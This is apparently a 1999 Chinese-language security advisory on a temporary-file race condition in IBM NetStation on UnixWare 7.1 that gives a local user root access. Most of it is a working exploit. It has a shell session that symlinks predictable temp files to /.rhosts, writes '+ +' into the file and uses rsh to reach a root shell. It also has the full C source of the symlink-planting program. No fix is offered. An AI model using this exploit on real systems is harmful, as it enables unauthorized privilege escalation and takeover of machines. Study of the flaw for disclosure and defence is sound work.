发布日期：1999-12-28
更新日期：1999-12-28

受影响系统：

NetStation on UnixWare 7.1

描述：

---

    IBM Network Station Manager存在可让本地用户获取根用户权限的安全漏洞。
    NetStation在创建临时文件时没有使用安全的mktemp函数，它只是简单地将当前时间（秒）附加到已知文件名后。这是一个“竞争条件”安全漏洞。通常对于那些以nobody或同类权限运行的守护程序来说，这个漏洞不会造成太大问题。但NetStation必须由root运行，从而有打开/修改特定用户文件的权限。攻击者可以利用从xnec.nsu.<time>到/.rhosts的强制符号链接，最终获取root权限。





测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

bash-2.02$ ls /usr/netstation/nsm/users/xnec
UX:ls: ERROR: Cannot access /usr/netstation/nsm/users/xnec: No such file or directory

<连接到 http://localhost:880 登录>
<Hardware -> Workstation>

bash-2.02$ ls /usr/netstation/nsm/users/xnec
xnec.nsu  xnec.usr
bash-2.02$ cc -o nsmx nsmx.c
bash-2.02$ ./nsmx

<再次单击Workstation>

bash-2.02$ ls -la /.rhosts
-rwx------    1 xnec     other             0 Dec 28 06:19 /.rhosts
bash-2.02$ echo "+ +" > /.rhosts
bash-2.02$ chown root /.rhosts
bash-2.02$ rsh -l root localhost sh -i
# id
uid=0(root) gid=3(sys)
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit)
,10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)
#


/* nsmx.c - IBM NetStation on UnixWare 7.1 local root exploit
*
* Exploits a temporary file race condition in NetStation's HTTP interface
*
* To exploit: first, change the paths below to reflect your individual
* settings/paths.  Don't worry if <username>.nsu doesn't exist, NS will
* create it for you.  Next, point your browser at
* http://localhost:880 and login as a normal user.  Click on "Hardware"
* Then "workstation".  This will create <netstationdir>/users/xnec.
* Next, compile and run this program.  You only have thirty seconds from
* the time you complete this step to then click on "Workstation".  When
* this is done, you should have an /.rhosts which you own.  On some
* UnixWare systems, you may need to chown root /.rhosts in order to do
* rsh -l root localhost sh -i.
*
* Brock Tellier btellier@usa.net
*
*/


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/time.h>

void main() {

/* Change these paths */

char dest[20] = "/.rhosts";
char source[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
char sourcesym[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
long sec;
int i;

sec = time(0);

for (i = 0; i < 30; i++) {
  sprintf(sourcesym, "%s%d", source, (sec + i));
  symlink(dest,sourcesym);
}

}



建议：

---

    暂无。



浏览次数：6825
严重程度：0（网友投票）